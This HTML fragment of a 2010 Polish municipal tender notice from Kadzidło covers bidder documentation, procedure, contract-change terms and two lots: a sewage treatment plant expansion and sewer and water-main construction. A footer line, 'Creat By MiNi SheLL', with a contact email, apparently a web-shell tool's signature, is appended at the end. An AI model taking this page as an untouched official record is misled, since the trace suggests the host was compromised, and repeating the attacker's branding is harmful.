<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Form. 5a - wykaz wykonanych prac projektowych,
Form. 6 - zbiorcze zestawienie cen poszczególnych elementów zadania - wzór,
Form. 6a - wzór kosztorysu ofertowego,
Form. 7, 7a - harmonogram realizacji robót,
Form. 8, 8a  - wzór umowy,
Dowód wniesienia wadium.
Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,
 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument
ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia
publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony mogą zmienić postanowienia zawartej umowy jeżeli zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można uniknąć ani im zapobiec, a w szczególności zmiany mogą dotyczyć:
1)	zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa.
2)	zmiany terminu realizacji umowy w przypadku:
a. jeżeli wykonanie zamówienia dodatkowego (robót dodatkowych) lub robót zamiennych wpłynie na termin wykonania zamówienia podstawowego, 
b. wystąpienia okoliczności wynikających z tzw. siły wyższej (np. huragany, gwałtowne burze) uniemożliwiających realizację robót  przez okres dłuższy niż 2 tygodnie. Wstrzymanie robót z tego powodu musi być  potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru. Wstrzymanie robót budowlanych ze względu na warunki atmosferyczne typowe (właściwe) dla danej pory roku i miesiąca, lub zła organizacja robót nie uzasadniają zmiany terminu umowy.
c. potrzeby wstrzymania robót budowlanych przez Zamawiającego z przyczyn od niego niezależnych.
3)	zmiany wynagrodzenia (ceny) oraz w zakresie przedmiotu umowy:
a.	jeżeli dla należytego wykonania zamówienia konieczne będzie wykonanie robót zamiennych lub zaniechanie części robót.
b.	jeżeli nastąpi ograniczenie lub brak środków finansowych
c.	zmiany stawki VAT 
4)	konieczności zrealizowania robót budowlanych przy zastosowaniu innych rozwiązań niż wskazane w dokumentacji technicznej i ofercie, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło nie wykonaniem lub wadliwym wykonaniem robót.
3.	W innych przypadkach określonych w niniejszej umowie
4.	Strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania  zaistnienia okoliczności. Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.kadzidlo.samorzady.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kadzidło, ul Targowa 4, 07-420 Kadzidło, pok. nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2010 godzina 10:00, miejsce: Urząd Gminy Kadzidło, ul. Targowa 4, 07-420 Kadzidło, pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zaprojektowanie i rozbudowa oczyszczalni ścieków w Kadzidle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Zaprojektowanie i rozbudowa oczyszczalni ścieków w Kadzidle zlokalizowanej na działkach o numerach ewidencyjnych: Nr 47/2, 47/1, 45/1 - ul. Lokalna 
w Kadzidle, na podstawie Programu Funkcjonalno - Użytkowego. Przepustowość  oczyszczalni ścieków, jaką winien uwzględnić Wykonawca w opracowywanym projekcie budowlanym wyniesie Qśr. = 710 m3/d, Qmax.d = 828 m3/d, Qmax.h =62 m3/h.
Zakres zamówienia obejmuje:
1)	wykonanie, zgodnie z wymogami określonymi w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2000 r. Nr 106, poz. 1126 z późn. zm.), projektu budowlanego we wszystkich branżach inżynierskich i architektonicznych, dla oczyszczalni ścieków w Kadzidle oraz uzyskanie wszelkich opinii, uzgodnień, pozwoleń i innych dokumentów wymaganych przepisami szczególnymi, niezbędnych do uzyskania decyzji o pozwoleniu na budowę; 
2)	wykonanie, zgodnie z wymogami określonymi w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2000 r. Nr 106, poz. 1126 z późn. zm.), projektu wykonawczego we wszystkich niezbędnych branżach inżynierskich i architektonicznych, operatu wodnoprawnego dla oczyszczalni ścieków w Kadzidle oraz uzyskanie wszelkich opinii, uzgodnień, pozwoleń i innych dokumentów wymaganych przepisami szczególnymi, niezbędnych do uzyskania zmiany decyzji pozwolenia wodnoprawnego; 
3)	wykonanie pełnego zakresu robót ujętych w projektach,
4)	wykonanie niezbędnych robót towarzyszących (zorganizowanie placu budowy, biura, zaplecza budowy, uporządkowania terenu po pracach ),
5)	uruchomienie oraz wykonanie rozruchu i przekazanie po uzyskaniu założonego efektu ekologicznego oczyszczalni do eksploatacji, 
6)	dokonanie przeszkolenia personelu przyszłego użytkownika wybudowanych obiektów - 
5 osób.
7)	usługi serwisowe w okresie gwarancyjnym - wymagany czas reakcji na usunięcie awarii - 24 godziny od momentu zgłoszenia. W przypadkach zagrażających bezpieczeństwu obiektu lub niebezpieczeństwu związanemu z ochroną środowiska wymagany czas reakcji na rozpoczęcie usuwania awarii - 4 godziny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kanalizacja sanitarna w osiedlach Podtatarza w Kadzidle i rozbudowa sieci wodociągowej w Kadzidle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres wchodzą następujące roboty:
Etap I:
1.	Modernizacja budynku przepompowni głównej wraz z zagospodarowaniem terenu- 1  szt.
2.	Budowa przepompowni strefowych oraz instalacje elektryczne - 15 szt.
Etap II:
1. Sieci kanalizacyjne             -  6.770 m.
2. Pompownie strefowe          -  4 szt. 
3. Przykanaliki                        - 146/2.636 szt./m
4. Sieci i instalacje elektryczne   - wg projektu.

Rozbudowa sieci wodociągowej:
1. Sieć wodociągowa o średnicy 160 mm   - 1244  m
2. Sieć wodociągowa o średnicy 110 mm   -   934  m
3. Sieć wodociągowa o średnicy   90 mm   -   665  m
4. Sieć przyłączeniowa (przyłącza w drogach publicznych) o śr. 40 mm -121 m
5. Studzienki wodomierzowe                 -  9 szt./80 m    

Zakres prac do wykonania ujęty jest w dokumentacji projektowej, przedmiarach robót, specyfikacjach technicznych wykonania i odbioru robót, które są dostępne w wersji elektronicznej na stronie internetowej zamawiającego i stanowią załączniki do niniejszej SIWZ. 
Zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie niezbędnych informacji do sporządzenia oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9, 45.23.24.23-3, 45.23.13.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com